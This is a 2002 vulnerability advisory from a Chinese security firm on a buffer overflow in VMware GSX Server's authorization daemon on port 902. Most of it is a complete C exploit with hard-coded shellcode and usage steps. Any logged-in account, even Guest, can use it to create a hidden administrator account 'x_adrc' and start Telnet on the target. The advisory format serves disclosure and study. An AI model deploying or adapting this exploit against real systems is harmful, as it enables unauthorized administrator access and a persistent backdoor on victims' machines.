VMware GSX Server Remote Buffer Overflow Vulnerability
Create time: 2002-07-24
Article attribute: original
Article submission:
ZAG23 (Bigball_at_venustech.com.cn)
Author: zag & glcs
Date: 2002/07/24
Affected system:
VMware GSX Server 2.0.0 Build-2050 for Windows (other versions have not been tested)
Windows NT / 2000 / XP
Vulnerability Description:
VMware GSX Server is a popular virtual-machine product. Its remote-access management service,
the VMware Authorization Service, contains a buffer overflow. Although the program includes
length checks intended to prevent buffer overflows, a design defect leaves the overflow reachable and
exploitable, so any account that can log in to the service (even a Guest account) can execute arbitrary code with administrator privileges.
Vulnerability analysis:
(Thanks to ISNO to leave me a lot of overflow reference materials)
VMware GSX Server talks to the VMware Remote Console through the VMware Authorization Service,
which listens on TCP port 902 and accepts the Remote Console's connection.
The handshake exchanged before any data communication looks like this:
220 VMware Authentication Daemon Version 1.00
User Anyuser
331 Password Required for User.
Pass ******
230 User Logged in.
Global Server
200 Connect Global
The USER, PASS and GLOBAL commands have a length limit; when the argument string is too long the connection is dropped
and a message similar to `599 VMware-Authd Panic: Buffer overflow in vMauthdsocketRead()`
is returned:
220 VMware Authentication Daemon Version 1.00
User aaaa.... (500 × 'a')
599 VMware-Authd Panic: Buffer overflow in vMauthdsocketRead ()
However, the GLOBAL command still overflows when given a string that does NOT exceed the defined length limit.
The overflow terminates the VMware Authorization Service; by building a short payload that
overwrites the saved return address, our own code is executed instead. (The payload relies on a `jmp esp`
gadget address and an API address that are hard-coded for one Windows build, so it must be re-targeted for other versions.)
Assuming you already have a Guest account on the target, we wrote the following test code:
// vmwareoverflowtest v1.0
// Written by Zag & Glcs
// bigball@venustech.com.cn Glcs@venustech.com.cn
//
// http://www.venustech.com
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "winsock2.h"
#pragma comment(lib, "WS2_32")
So that the GLOBAL command, shellcode included, stays under the maximum length limit, the shortest
possible shellcode is used. It pushes a `cmd /c net user ... /ADD & net start tlntsvr & net localgroup administrators ... /ADD`
command line onto the stack and runs it through a hard-coded kernel32 address:
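// Add administrator account: x_adrc, password: x_adrc
// Start the Telnet service
//
// Decoded, the 140 bytes below are a run of PUSH imm32 instructions that build
// the following command line on the stack, lowest address first:
//
//   cmd /c net user x_adrc x_adrc /ADD&net start tlntsvr&net localgroup administrators x_adrc  /ADD
//
// The terminating "ADD\0" dword is produced as  push 0x093515c1 ; sub [esp],0x08f0d180
// so the payload itself contains no NUL byte (it is later copied with
// strlen()-based sizes).  The tail is
//   mov eax,esp ; push 1 ; push eax ; mov eax,<imm32> ; call eax ; nop
// i.e. a call of <imm32> with (cmdline, 1) as arguments -- presumably
// WinExec(lpCmdLine, SW_SHOWNORMAL) on the Windows build the authors tested;
// verify the address against the target's kernel32.dll.  The imm32 occupies
// shellcode[133..136] and is patched by main() according to the target type.
unsigned char shellcode[] =
    "\x68\xc1\x15\x35\x09\x81\x2c\x24"
    "\x80\xd1\xf0\x08\x68\x63\x20\x20"
    "\x2f\x68\x5f\x61\x64\x72\x68\x72"
    "\x73\x20\x78\x68\x72\x61\x74\x6f"
    "\x68\x6e\x69\x73\x74\x68\x61\x64"
    "\x6d\x69\x68\x6f\x75\x70\x20\x68"
    "\x61\x6c\x67\x72\x68\x20\x6c\x6f"
    "\x63\x68\x26\x6e\x65\x74\x68\x74"
    "\x73\x76\x72\x68\x20\x74\x6c\x6e"
    "\x68\x74\x61\x72\x74\x68\x65\x74"
    "\x20\x73\x68\x44\x44\x26\x6e\x68"
    "\x63\x20\x2f\x41\x68\x5f\x61\x64"
    "\x72\x68\x72\x63\x20\x78\x68\x78"
    "\x5f\x61\x64\x68\x73\x65\x72\x20"
    "\x68\x65\x74\x20\x75\x68\x2f\x63"
    "\x20\x6e\x68\x63\x6d\x64\x20\x8b"
    "\xc4\x6a\x01\x50\xb8\xc6\x84\xe6"   /* mov eax,0x77e684c6 starts at [132]; address bytes [133..135] */
    "\x77\xff\xd0\x90";                  /* [136] last address byte ; call eax ; nop */

/* Return-address value: a `jmp esp` gadget at 0x77e3171b (stored little-endian),
 * valid only for the English Windows XP build noted by the authors. */
unsigned char JMP_ESP_XP_ENG[] = { 0x1B, 0x17, 0xE3, 0x77 }; // WinXP ENG

/* Gadget address selected for the current target by main().  Four raw bytes,
 * NOT a NUL-terminated string: fill it with memcpy(), never strcpy(). */
unsigned char JMP_ESP[4];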
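/* Print the banner and command-line syntax.  The five arguments correspond to
 * main()'s argv[1..5]: target IP (dotted quad), authd TCP port (902 on GSX
 * Server), a user name and password valid on the target, and a numeric
 * target-type selector (only 0 = Windows XP English exists in this listing). */
void usage(void)
{
    printf("VMwareOverflowTest V1.0\n"
           "Written by ZAG & GLCS\n"
           "email: bigball@venustech.com.cn\n"
           "       Glcs@venustech.com.cn\n"
           "www.venustech.com\n\n"
           "usage: vmwareoverflowtest.exe <host> <port> <user> <pass> <target>\n"
           "       target: 0 = Windows XP English (the only type in this listing)\n");
}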
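/* Send "<cmd> <arg>\r\n" through sock, using buf as scratch space.
 * Returns 0 on success, -1 if the line would not fit in buf or send() failed. */
static int send_command(SOCKET sock, char *buf, size_t bufsize,
                        const char *cmd, const char *arg)
{
    size_t cmdlen = strlen(cmd);
    size_t arglen = strlen(arg);
    size_t total = cmdlen + 1 + arglen + 2;

    if (total >= bufsize) {
        printf("argument too long\n");
        return -1;
    }
    memcpy(buf, cmd, cmdlen);
    buf[cmdlen] = ' ';
    memcpy(buf + cmdlen + 1, arg, arglen);
    memcpy(buf + cmdlen + 1 + arglen, "\r\n", 2);
    buf[total] = '\0';
    return send(sock, buf, (int)total, 0) == SOCKET_ERROR ? -1 : 0;
}

/* Read up to 100 bytes of the daemon's reply (one "NNN text" status line)
 * into buf and echo it.  buf is zeroed first, so the reply is always
 * NUL-terminated as long as bufsize > 100. */
static void print_reply(SOCKET sock, char *buf, size_t bufsize)
{
    int n;

    memset(buf, 0, bufsize);
    n = recv(sock, buf, 100, 0);
    if (n > 0)
        printf("%s", buf);
}

/*
 * Entry point: connect to vmware-authd, log in with the supplied account and
 * send the GLOBAL command carrying the overflow payload.
 *
 *   argv[1]  target IP address (dotted quad)
 *   argv[2]  authd TCP port (902 on GSX Server)
 *   argv[3]  user name accepted by the target (any account, e.g. Guest)
 *   argv[4]  that user's password
 *   argv[5]  target type selector; only 0 (Windows XP English) exists in this
 *            listing, every other value maps to the same addresses
 *
 * Returns 0 once the payload has been sent, -1 on a Winsock, address or
 * connection failure.  Whether the overflow succeeded is not reported back
 * over the socket; check with telnet as described below.
 */
int main(int argc, char **argv)
{
    char str[4096];
    WSADATA wsa;
    SOCKET sock;
    struct sockaddr_in server;
    long port;
    size_t len;
    int i;

    if (argc != 6) {
        usage();
        return 0;
    }

    port = strtol(argv[2], NULL, 10);
    if (port <= 0 || port > 65535) {
        printf("bad port: %s\n", argv[2]);
        return -1;
    }

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        printf("WSAStartup failed\n");
        return -1;
    }

    memset(&server, 0, sizeof server);
    server.sin_family = AF_INET;
    server.sin_port = htons((unsigned short)port);
    server.sin_addr.s_addr = inet_addr(argv[1]);
    if (server.sin_addr.s_addr == INADDR_NONE) {
        printf("bad host address: %s\n", argv[1]);
        WSACleanup();
        return -1;
    }

    /* Target selection: patch the API call address into shellcode[133..136]
     * (the imm32 of the trailing `mov eax,<addr>`) and pick the matching
     * `jmp esp` gadget.  Only one target exists in this listing, so 0 and
     * every other value resolve to the Windows XP English addresses. */
    switch (atoi(argv[5])) {
    case 0:   /* Windows XP English */
    default:  /* no other target known: same addresses */
        shellcode[133] = 0xc6;
        shellcode[134] = 0x84;
        shellcode[135] = 0xe6;
        shellcode[136] = 0x77;
        /* memcpy, not strcpy: JMP_ESP_XP_ENG is four raw bytes with no NUL
         * terminator, so strcpy() read past its end and overflowed JMP_ESP[4]. */
        memcpy(JMP_ESP, JMP_ESP_XP_ENG, sizeof JMP_ESP);
        break;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("socket error\n");
        WSACleanup();
        return -1;
    }

    if (connect(sock, (struct sockaddr *)&server, sizeof server) == SOCKET_ERROR) {
        printf("connect error\n");
        closesocket(sock);
        WSACleanup();
        return -1;
    }

    /* Banner: "220 VMware Authentication Daemon Version 1.00" */
    print_reply(sock, str, sizeof str);

    /* USER / PASS: the vulnerable GLOBAL command is only reachable after a
     * successful login, so a valid (even unprivileged) account is required. */
    if (send_command(sock, str, sizeof str, "User", argv[3]) < 0)
        goto fail;
    print_reply(sock, str, sizeof str);

    if (send_command(sock, str, sizeof str, "Pass", argv[4]) < 0)
        goto fail;
    print_reply(sock, str, sizeof str);

    /* GLOBAL payload.  "Global " (7 bytes) is followed by 36 eight-byte units
     * of   nop ; nop ; pop eax ; push <jmp esp address>   at offsets 7..294,
     * then the shellcode, then CR LF.  The exact distance to the saved return
     * address is not known ("semi-continuous overwrite", no precise
     * positioning): whichever unit lands on the return address supplies the
     * gadget address, and the units above it execute linearly (pop/push keep
     * esp balanced) into the shellcode. */
    memset(str, 0, sizeof str);
    memcpy(str, "Global ", 7);
    for (i = 7; i < 288; i += 8) {
        memcpy(str + i, "\x90\x90\x58\x68", 4);
        memcpy(str + i + 4, JMP_ESP, 4);
    }
    len = (size_t)i;                                  /* 295: end of the units */
    memcpy(str + len, shellcode, sizeof shellcode - 1);
    len += sizeof shellcode - 1;
    memcpy(str + len, "\r\n", 2);
    len += 2;                                         /* well below sizeof str */

    if (send(sock, str, (int)len, 0) == SOCKET_ERROR)
        goto fail;
    printf("Done!\n");
    closesocket(sock);
    WSACleanup();
    return 0;

fail:
    printf("send error\n");
    closesocket(sock);
    WSACleanup();
    return -1;
}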
After compiling this code under VC and running it, telnet to the target host with user x_adrc / password x_adrc
and inspect the x_adrc account: it is a member of the Administrators group. Administrator privileges
have therefore been obtained from an arbitrary (Guest-level) account.
Related reference:
YUANGE, <<WideChar String Buffer Overflow Attack Technology>>, the chapters on the continuous-overwrite ("semi-continuous coverage") method
about Us:
Beijing Venustech - Active Defense Research Center (Venustech-ADRC)